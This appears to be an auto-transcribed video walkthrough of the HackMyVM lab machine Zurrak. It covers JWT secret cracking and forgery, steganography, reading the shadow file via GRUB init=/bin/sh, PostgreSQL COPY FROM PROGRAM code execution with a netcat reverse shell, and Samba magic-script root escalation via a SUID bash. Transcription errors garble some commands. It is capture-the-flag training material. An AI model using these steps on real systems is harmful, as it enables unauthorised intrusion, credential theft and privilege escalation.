Yo, what's going on, guys? In this video, we're going to be doing Zurrak from HackMyVm. This box right about solid or medium. And yeah, let's get on to the video. As always, I'm starting by putting my terminals here. I'm starting running a that's covered my SR 10.0.0.1/24/IT0, so grep out for PCS. Doing this, we do get IP the box 10.0.103, so do control shift Z, so we're doing MM scan. So do MMISSC for default scripts, means information. We'll scan upwards and IP. Doing this, I'll do my Z verbos. This can take some time, so I'm just going to more into scan.txt. Look at the ports, they have 4 ports open. We do have port 80 open for HTTP, running Apache for Debian. Also do have 2 ports open for 139, also 445 for SMB, and also port 5432 open for Postgres for PostgreSQL DB for 9.6.0. So I'm servicing port 80. You already get an email address and also a password here, so to control your source code. Yeah, we do get a username and also a password. So I'm going to copy this username, which is going to be for the email, and also the password for test site. Copy the test site. We're going to log in, and we're able to log in. Before doing that, I do want to run a GoBuster. So to GoBuster, to remote my student to the IP address, take off this login.php. We'll do my SW for user share word list. Robust directory list with medium.txt, which extends the HTML, TXT, and also PHP. So looking back at the ports, they have 2 ports open for SMB for 139, so port 445 for SMB. So I'm going to start by using SMB map. I'm going to start by enumerating for some shares. So I'll do -H for 10.0.0.103. It seemed like we do get access denied. Also want to use SMB client. We'll do -L so you can list out the shares for 10.0.0.103. Into the password. And it doesn't seem like we can list out any shares, right? We don't have any shares. The last thing I would like doing is, or last thing I usually do is run enum for Linux -A, so it does all the checks for the remaining for users and also shares. So do 10.0.0.103. So we could just let this enumerate. And it doesn't seem like we can find a valid user or any shares on this IP address. Since we are logged in as internal, I do want to do or we're not logged in, but under here, since we're logged in, we do control use source code. We do have an admin.php. I'm going to do control or F11, or not F11, F12 for the storage here. If you go into the network, you can do F12, or you can just do right click, just press Q. And this will take you to the inspect, so you can inspect the element. Go to storage. Under here, since we're logged in, we do have a token here. Just by the look of this, we do have this as JWT, which is going to be a JSON web token. The reason I say that is because we do have this separated by, you'll see that I do have this by periods for EY. We go back, we have the next one for, it's all starting by UFK, right? Which I believe the last point is going to be for the signature. So UFK, that's going to be for the signature for JWK or JWT. So I'll do JWT. I will do this for a token. I want to copy that token that we did have. Under here, you'll see this under the payload. This is separated by sections. So you can actually, if you wanted to, you don't have access to JWT, you can just echo this. I'll just do this manually. Echo it, pipe it out to bat or base64 -D, so we can decode that. You'll see that we do have the name for John Doe. So start by putting that in there, or that's for John Doe. But let's get the our token, our JSON JWT. We have the email followed by is admin to false. The email that we did log in as was going to be for internal as Zurrak.htb. The is admin is for false since we're not, of course, as admin. If we try to visit this admin.php, I believe, it's going to be a redirect, which does make sense because looking on GoBuster, we should have an admin.php, which can be a status for 302 for redirect. So if we are under admin, let's see if we can actually visit the admin.php. So in this case, I would put like the is admin to true, but to change the payload, we're going to need a secret. Going to the secret, I'm going to copy the original that was in the token for internal. I'm going to VI into a hash.txt, put that in there. right quit. I'm gonna use John so we can actually crack it and get the secret key. So do wordless for user share wordless rockU.txt or for hash.txt. So we do John is my show for hash.txt. And we do have the secret key for test123. So now we can put this into JWT. We have this for test123. And since we do have the secret code or the secret, which is called the secret for like the token, we can put the isAdmin as true now. So now we're allowed to edit the payload data. So now if we put this into the value here, put that in there, we refresh this, we go to admin.php now, admin.php, where we do get a welcome admin since we're able to change the payload or crack, we're able to crack the basically the encoded for the token, get this test123 password, which is the secret. From there we can change this as admin true, right? Because usually like websites will have this for like the whole, will have the payload for the whole site just followed by like a secret key. So if you can figure out the secret key, you can change the payload and actually put that inside the token, right? And doing that, we are under admin. So under admin, we do have some images here. I'm guessing there's going to be some stego in here since we have images. It's telling us not to use these images for file transfers. We also do have an SMB share named share. So we do have a SMB or share named share. Also, we have a magic script for emergency.sh. So anytime we do put like an emergency.sh, we can put like a bash, like one-liner in there, and it'll execute under SMB, right? But in this case, we don't have a user, so we can't execute. We can't we use the put command under SMB to put the emergency.sh. So we did have an SMB share for share. Also do have these images here. So I'm going to copy copy the image location. I'll just make a directory for images. We'll cd into images. I'm going to get this. We do have a steg seek or you can use steg hide. I mean, steg hide will actually do the same thing. So we'll do steg hide, we'll do extract -sf or Zurrak hearts JPEG. Press on that. I want to check if this does have a password. It doesn't have a password, and we do have stego under this image here. We do have the data extracted to asli.exe. So I run a file command against asli.exe. This is indeed a .exe file, Windows executable. Also, if you want to get like the .out, if you want to get JPEG.out, run a steg seek for the image. We can specify user share wordless rockU.txt. You see it did find the passphrase, which is no passphrase. So you have the original file name followed by just extracting this out. I would just like run, if you run do this against the .out file, you can just use the move command and move that into a .exe. So since we do have a .exe, I want to start by analyzing this within Ghidra. So I do have a directory here, which is install. Install is for Ghidra for the OpenJDK because it's for Java. And Ghidra does need a JDK to run this. So I'm going to go to the GitHub for Ghidra just to show. You can go under the releases. And the reason I do have that directory, which is the install directory, is because it's not going to show up on my Linux machine, right? So I just use my real Windows machine, start a Python server, and transfer that file to my Linux machine. Same thing here. You can go into, if you do Control F for JDK, you'll install the JDK. And here it doesn't show up for me, but if you go to the release archive, you have the versions under here, which you can download for 64-bit for Linux. So here I do have a .zip and also a tar. So I'll do tar is xvf for the open. It's going to extract the JDK. Also do have this unzip for Ghidra. So I'm clearing my terminals here. We do have a directory for Ghidra now. Also for JDK. So I can run Ghidra run. This is going to start with Ghidra. And if you don't have the file path already specified, it will usually ask you for the file path. Make sure you do specify this for JDK. Inside this JDK directory it should specify for Ghidra to run. So here I'm just going to go to File, we'll go to New Project. I'll just put this for test, go to Finish. Let's start with Ghidra. So I'm going to go to Files, we'll go to Import the file. There we do have this ASLI. Go to OK. Go to Yes. Go to Analyze. And go to OK. And under here we do have, like right off the bat, we do have to compile for the main, for the .exe. And this does seem to be hexadecimal or hex. So I'm going to just copy this. And also if you don't have a decoder, or if you don't want to use a decoder, you can just highlight this and it'll pop up for the hexadecimal for I. And it does spell out you have the I. We just copy that. For char, we'll have that for V. You can just change this to char. And now we do have this for changes to char. So this is LOVECATS, right? So we need to have this for I love cats. Let's try to confirm this if this is actually true. We go to CyberChef. We go to input, go to from hex. We don't have this copy to write. So we do know the password is I love cats. Let's close this out one more time. Not sure why this closed out on me. Let's go to Ghidra one more time. There's CD to Ghidra. Go to Ghidra run. At least we do know the password already. There you go. Okay. So we do have this already as a project, so we don't need to worry about that. So just go to main. Yeah, so we do have this right here. So it's cool. I don't have to import it. I already have the project saved, but copy this. We'll convert this, point that in there, and just show for I love ats. It's not going to convert it right or decode it right, but doing that within Ghidra can just convert this to each single one to the char. You do see that starts with I, which can be for I love cats. I also did have a user within the file name. Let's go back. I'm just gonna write we do have the password, so I want to put the password so I don't forget it for I love cats. So I believe it was under install. Did it have? This was under images. We do have this for ASLI. This does seem to be like a user, so I'm gonna try this for SMB map. Or we'll try SMB client. Should be a little easier. We'll do it -L 10.0.0.103. We did have the share for share. We'll do -U for ASLI. Then we have the I love cats. And doesn't seem to work for 103. I have the ASLI for the user. Instead of trying to listing it, let's try to just connect straight to just with the direct password. And it does seem to work. So it doesn't seem like we can list it out, or I was listing out the share. We don't want to list out the share, but if I had the share with the IP address, we do -L for I love. I wonder if this is gonna, it's not gonna work with the -L, so it's not gonna let us list the share, but we do have the share for share, right? We do I love cats, and we're in. We do ls, and we are under this user for ASLI, right? As a user. So I'm start doing some manual enumeration under here. We do have a couple directories here. We do have backup.reg, launch operations. Let me get this launch operations.txt. Let's see what is under here. Typically it was under this, yeah, under this directory. So it's going to be under this directory that we do get files. Nothing under here. We do have human resources, employees, status, get the status.txt. Need to latest list from add. Okay. Nothing under here. Let's go into operations. We do have a directory here for binaries. Let's go into binaries. Go to dir. It doesn't seem like we have anything in here. We'll go into new folder. This is not, this directory does have a space under here. So I do specify this in quotes. So now we're able to do that. Because if you don't do that, it's going to probably, it's going to give a weird syntax because of that space, right? CD into 3. We'd have a latest under here. I'll go into each directory. We'll go into approved. Go to dir. And under here, we do have a vmdk file. I'm going to get this Zurrak. So this is going to be a disk file. So we can actually import this within VMware. And we actually got to do a couple configurations within VMware to actually import it. Because it's going to create the VM, or we've got to create a new VM. And it's going to create a disk. So we got to delete the disk. Add this disk that we do have for this vmdk file for VMware. I recommend doing this within virtual or VMware, not VirtualBox. VirtualBox is really difficult to work with. We'll start by checking into the other directories. We do have decline, nothing under here. Go back. We do have this for 2. Read, let's get this read.txt. Got this read.txt. We have this deleted. It doesn't seem like we do have anything. But we do have that vmdk file. And if I run a file against Zurrak, we have this VMware 4 disk image. So this is a disk image. So it's basically just replacing, we can create a new image or create a new virtual machine and put this as a disk image. So I am under VMware right now. I'm going to go to file. We'll go to create a new virtual machine. I do have this virtual machine for Windows Workstation Pro. So if I go to, I'm just going to go to typical. I am going to blur some of this out, but you can go to I will install the operating system later. Go to next. Go to next. I don't care about the machine. Just go to really, I don't really care how it's set up for split or single for the disk. So I'm just going to go to edit virtual machine settings. I want to go into the hard disk. I want to remove the hard disk since we're going to be adding this new vmdk file. Go to add. Go to the add the hard disk. Do for RCSI. Use existing virtual hard disk. I'm going to go to browse. And in this case, I do need to start a Python server. So I'll do python 3 -m http.server and port 8081. I'm going to be blurring this out since it's going to be under my desktop. So I'll cd into my desktop. So we get http 10.0.071 on 4.881. We have this Zurrak.old.vmdk. So now we do have this downloading using wget. And now I do have this on my desktop. So I'm going to go back. I'm going to go to edit virtual machine settings, go to the hard disk, go to browse. Now you want to specify where your vmdk is. I'm just going to specify this one. Go to finish. I'm going to keep the existing format. Go to OK. Now we can start up this virtual machine. Okay, we'll just put that for yes. And right now I just want to see how this is going to be, how this is going to run. And yeah, this just gives me a login, right? We did have the user for a ASLI for, we go back, we go to images, just to make sure, ASLI. I'm going to try the password for I love cats. And it doesn't seem to work. So I'm going to restart the machine. I'm going to go just to restart guest. I want to do this for E. If we just type in E, I want to go into the grub and actually execute this. So next time I do restart the machine, I do want to run like a bin/bash on the grub. So I'm going to go to this line here. I'll go to read write. We'll go to init and we can just execute this for /bin/sh. We want to do Control X. It's going to restart the machine. This should load into the grub or like load a shell. So if we do ID, now we're under root for run a bash. You notice I do have a root at none. So if I try to do it like ifconfig, I'm not going to have a IP for this machine. So I don't know the IP of this machine, right? Let's actually make sure I do have this for, go to manage. Let's go to VM, go to settings. I want to check this for bridged, replicate the physical network state. Go to OK. If I do ifconfig, it's not going to work. So I'm going to try a password command. I want to change the password just to pass. Do pass. And since we did reset the password for root, we should be able to get the host name. But this should give me a host name for this machine and also a proper IP address. So I do have this for the login. I'm going to type this for root, we do pass, we do ID. Now you do see that I do have root as Zurrak. So do ls-delay, the pwd. I'm going to cap my /etc password to check what we do have for what user we do have on the box. And here we just have for Postgres and also for root. We'll cap my /etc password, not the password file, but we'll cap the /etc shadow since we're under root. Postgres, and then same thing for root. Yeah, so we don't have bash. That's for the password file, right? But grepping out the users, you should be able to grab those users. But now I do want to transfer this to my local machine since I just can't copy from here. So do ls-delay. We do have the /etc shadow file. I'm gonna check if we do have Python 3. We don't have Python 3, so do apt-get install for Python 3. We'll do -y. It doesn't seem like we can install, so we'll just do this with netcat. We do have netcat. We do have netcat. So do netcat. First, I want to start up my listener on port 80. So I'll do netcat we'll do LMVP on port 80. Start up a basic listener on port 80. We'll do netcat -w for 3. This is 510.0.071 on port 80. Well, we do want to send the file back to our machine. It's going to be that shadow file. Start on that. Now you do see that we do get the output here. We do ls-delay. Put this into a shadow file. Shadow.txt. Shadow.txt, right? We don't want any of these extra users here. Let's make a directory for crack. We'll just copy the shadow.txt to crack, cd into crack. So do John minus word list is equal to user share word list rocku.txt for shadow.txt. So we can just let this crack and see what we get. So it just seemed to crack. I'm going to do a John minus my show for shadow.txt. And we do have the password for root and also, which is going to be pass, which we set for pass when we did run the password command for root. And also for Postgres for baller15. So now we do have baller15 for that password or for that user. Looking back at the ports, we have port 5432 for Postgres or Postgres SQL. I'm going to start by going into hack tricks for posts. Let me just copy the banner. We do hack tricks for Postgres, SQL. And start by checking some documentation or viewing how to connect PSQL, -H for the host, -U for the username, and -D for the database. Let's see if we can specify a connection here. So I'll do Control-Shift-O. I'm going to set the host to 10.0.0.103. 10.0.0.103. Set the port to, what's the usual port? 55432. Set the username for Postgres. And also the password for $15. Let's copy this password. Does it work? It's asking us for the password, so I'm gonna take out this -W under there. And I believe this is not the same as I gotta look at documentation. We can do -list, so we can \list. And here we do have everything. Looking down here, we do have an exploit for Postgres SQL injection. So looking down here, we do have let's see if you can find some remote code execution. We do have a RCE for since version 9.3. As long as we do have for only super users, right? Let's see if we can actually copy this POC. Let me zoom in here. So it does seem like they do drop a table. Check if this table does exist. They create the new table for the output and also the text. They copy the cmd_exe for the program for ID, which is the command that's going to be ran. And they do run the select. And I'm guessing this is what's going to output it, right? We can see the output or copy. I believe this shows the output, right? So you can see, let's see if we can start by doing this. So I'm going to copy this. I'm going to put this into side by side here since I'm under Postgres. I'll just put this full screen. So we do have this for drop table. We do drop the table. I'm going to copy this next command to create the table. We create the program for ID. Copy one. This should output the command for ID. We do ID and now under Postgres. So instead of doing that ID command, let's see if we can actually start a build listener and do like run netcat, right? I'll do all rep netcat -LVP on 9001. Let's go back into Postgres. We'll drop that table one more time. Create the table. I'm going to copy this into my text editor so it doesn't run. I'll do like a netcat 10.0.071. What is on port 9001? We'll execute /bin/bash. Copy this. And doing this command, this is just going to run it. It's not going to show the output unless I do run. Of course, there's no output, but if I do run this, if you do run like the ID command, once you did run this would output that. We do ID, and now under Postgres. So I'm going to start by exporting my term as you go to xterm. Like my terminal's here now, so I'm going to start by running a TTY shell. So do Python 3 -c. We'll do import pty, pty.spawn, run a /bin/bash. We do ID, now under Postgres. So my VM did crash, but finally we're back under Postgres again. So I had to restart my machine, but now under Postgres. So we are under this directory. I'm going to start by doing some manual information under /home. We did have the user for Postgres. We have our user.txt and also emergency.sh. This emergency.sh, I believe, is a magic script, so it is executing under SMB. I do want to check under /etc for the magic script. I believe it's like a magic script. It shows like for roots or who it's ran by and also the user, right? If I grep out for Samba, I believe it's under here. Yes, we do have this for Samba. We have this smb.config file. So we do have the IPC for the share and also for internal. You see that the path is for opt internal. The user is going to be EMRE for the create mask for 0777. Force user is going to be for root. So when we do put that emergency.sh under SMB, it should execute for the valid or under the SMB for EMRE for the force user for root, right? So it's going to run as root, execute it, and we should get back, we can execute whatever we want, right, under this emergency.sh. We do have a valid user here for EMRE, but we don't have a password for EMRE. I want to find for, I don't know if I want to find a password, but I think it's better to best run lin piece on here. So we'll run lin piece with wget http 10.0.0.73 and port 8081. We have this for lin piece.sh. And you have this under my documents, go to privilege escalation for lin piece. So do python 3 minus m http.server and port 8081. Have this lin piece.sh. chmod plus x for lin piece.sh. And put line piece, we'll put lin piece. Go to terminals here. And now we do have lin piece.sh. So I'm going to run this lin piece.sh. I'll put this to like a file.txt. Do this, we can wait and see what we get. So after a while, we do have this file.txt. Got this file.txt. It didn't seem like we do have much in here, but looking at everything else, I want to start by heading out the, we'll do the first 200 lines here. Check for anything interesting that we do have. Doesn't seem like we do have anything for the first 200. We'll do this for 300. Nothing under here. It changes to do it for 400. Nothing is running as root. Maybe, hopefully there's a password with this for EMER or for that user that we did see, right? Yeah, we don't have a password. We'll try this for 600. For 700. And under here, we do have credentials in fs tab, empty tab for localhost, for internal, for EMRE, for the password for daily. So let's start by checking that. Do we have SMB client? I do want to check if we do have SMB client. We do have SMB client. So do you have SMB client? We want to do, just do 10.0, or we should probably specify this for localhost, right? For 10.127.00.1. We do have this for internal. Seems like that is going to be the share name for internal. We do -u for EMRE. Specify the password for daily 666. And it just seemed like that was a valid password, right? With the valid user. So in here, we'll just echo a /bin/bash. I don't have a T2Y, or I don't have a proper T2Y. On the box, we don't have SSH, so I'm going to be just doing this through echo. So do emergency.sh. I'm going to home. Postgres. So now I just want to, I just want to make sure this is the right, I spelled it right? The same as the emergency. So I'm just gonna put that in there. I'm going to overwrite this, the whole file, right? So I'll just put that in there. And instead of overwriting it, I just want to put this over into the next line. So I'll put a blank space, which is going to be a blank space now. And then the next line is going to be for, we'll do chmod u plus s. We'll do sud bitset for bin/bash. So now if we cat the emergency.sh, you'll see that I do have the header. It's followed by the space for chmod u plus s for bin/bash. So we now do osmyselect for bin/bash. We actually need to put this into the daily 666. We do ls. We can put the emergency emergency.sh. We have that under there. So now if we go back into the bin/bash for that, you see that we have the SCID bit set for bin/bash. We do -p, we do ID. Now we're under root. It's cd into root. Let's delay and cat root.txt. Now I'll catch you guys in the next one.